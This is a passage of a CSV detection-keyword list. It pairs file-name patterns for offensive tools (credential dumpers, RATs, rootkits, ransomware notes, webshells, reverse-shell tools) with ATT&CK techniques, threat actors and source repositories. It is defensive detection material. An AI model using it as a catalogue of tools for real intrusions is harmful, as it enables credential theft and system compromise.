in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom 
notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17698" "*\QuarksADDumper.*",".{0,1000}\\QuarksADDumper\..{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","17699" "*\QuarksPwDump*",".{0,1000}\\QuarksPwDump.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","17700" "*\QUARKS-SAM*",".{0,1000}\\QUARKS\-SAM.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#registry","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","17701" "*\Quasar.exe*",".{0,1000}\\Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17704" "*\Quasar.exe*",".{0,1000}\\Quasar\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17705" "*\QueryModuleClient.exe*",".{0,1000}\\QueryModuleClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","17709" "*\quickcrack.py*",".{0,1000}\\quickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","17714" "*\QuickViewAD.ps1*",".{0,1000}\\QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","17715" "*\quiet-riot-main*",".{0,1000}\\quiet\-riot\-main.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","17716" 
"*\r00t-3xp10it*",".{0,1000}\\r00t\-3xp10it.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17717" "*\R3ADM3.txt*",".{0,1000}\\R3ADM3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17718" "*\r57shell.php*",".{0,1000}\\r57shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17719" "*\r57shell127.php*",".{0,1000}\\r57shell127\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17720" "*\r77config.c*",".{0,1000}\\r77config\.c.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network 
connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17721" "*\r77-rootkit\*",".{0,1000}\\r77\-rootkit\\.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17722" "*\r77-x64.dll*",".{0,1000}\\r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17723" "*\r77-x86.dll*",".{0,1000}\\r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","17724" "*\rabbit-hole.exe*",".{0,1000}\\rabbit\-hole\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17725" "*\RagingRotator.go*",".{0,1000}\\RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","17733" "*\ragnarlocker1.txt*",".{0,1000}\\ragnarlocker1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17734" "*\ragnarok.txt*",".{0,1000}\\ragnarok\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17735" "*\RANSOM_NOTE.txt*",".{0,1000}\\RANSOM_NOTE\.txt.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","17736" "*\ransomexx1.txt*",".{0,1000}\\ransomexx1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17737" "*\ransomexx2.txt*",".{0,1000}\\ransomexx2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17738" "*\RansomNote.txt*",".{0,1000}\\RansomNote\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17739" "*\Ransomware.dll*",".{0,1000}\\Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17740" "*\Ransomware.exe",".{0,1000}\\Ransomware\.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","17741" "*\Ransomware.pdb*",".{0,1000}\\Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - 
TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17742" "*\rarce.py*",".{0,1000}\\rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","17743" "*\rarreg.key*",".{0,1000}\\rarreg\.key.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","17744" "*\RasMan.cpp*",".{0,1000}RasMan\.cpp.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17745" "*\rasman.exe*",".{0,1000}\\rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17746" "*\RasMan.sln*",".{0,1000}RasMan\.sln.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17747" "*\RasmanPotato*",".{0,1000}\\RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17748" "*\RATC.exe*",".{0,1000}\\RATC\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17749" "*\ratchatPT.go*",".{0,1000}\\ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","17750" "*\ratchatPT.syso*",".{0,1000}\\ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","17751" "*\ratnow.exe*",".{0,1000}\\ratnow\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17759" "*\rats\badrat_cs\*",".{0,1000}\\rats\\badrat_cs\\.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","17760" "*\rats\js_downloader.vba*",".{0,1000}\\rats\\js_downloader\.vba.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","17761" "*\rattler.cpp*",".{0,1000}\\rattler\.cpp.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17762" "*\Rattler.exe*",".{0,1000}\\Rattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17763" "*\Rattler_32.exe*",".{0,1000}\\Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17764" 
"*\Rattler_x64.exe*",".{0,1000}\\Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17765" "*\rattler-master*",".{0,1000}\\rattler\-master.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17766" "*\Rat-x64.exe*",".{0,1000}\\Rat\-x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17767" "*\Rat-x64.lnk*",".{0,1000}\\Rat\-x64\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17768" "*\rawrpc_embedded.py*",".{0,1000}\\rawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","17769" "*\RAZAR ASRAT.exe*",".{0,1000}\\RAZAR\sASRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17770" "*\Razar SRAT.exe*",".{0,1000}\\Razar\sSRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17771" "*\rbcd.py*",".{0,1000}\\rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17772" "*\rcat-v*-win-x86_64.exe*",".{0,1000}\\rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","17773" "*\rdcman.py*",".{0,1000}\\rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17779" "*\rdcmanfox.dll*",".{0,1000}\\rdcmanfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","17780" "*\RDP Recognizer.exe*",".{0,1000}\\RDP\sRecognizer\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17781" "*\RDP Recognizer.pdb*",".{0,1000}\\RDP\sRecognizer\.pdb.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17782" "*\RDP Recognizer1.exe*",".{0,1000}\\RDP\sRecognizer1\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17783" "*\RDP Recognizer3.exe*",".{0,1000}\\RDP\sRecognizer3\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17784" "*\rdp.py*",".{0,1000}\\rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17786" "*\rdp_check.py*",".{0,1000}\\rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17787" "*\RDPCreds.txt*",".{0,1000}\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17789" "*\RDPCredsStealerDLL*",".{0,1000}\\RDPCredsStealerDLL.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials 
provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17790" "*\RDPHook.dll*",".{0,1000}\\RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","17791" "*\RDPKeylog.exe*",".{0,1000}\\RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17792" 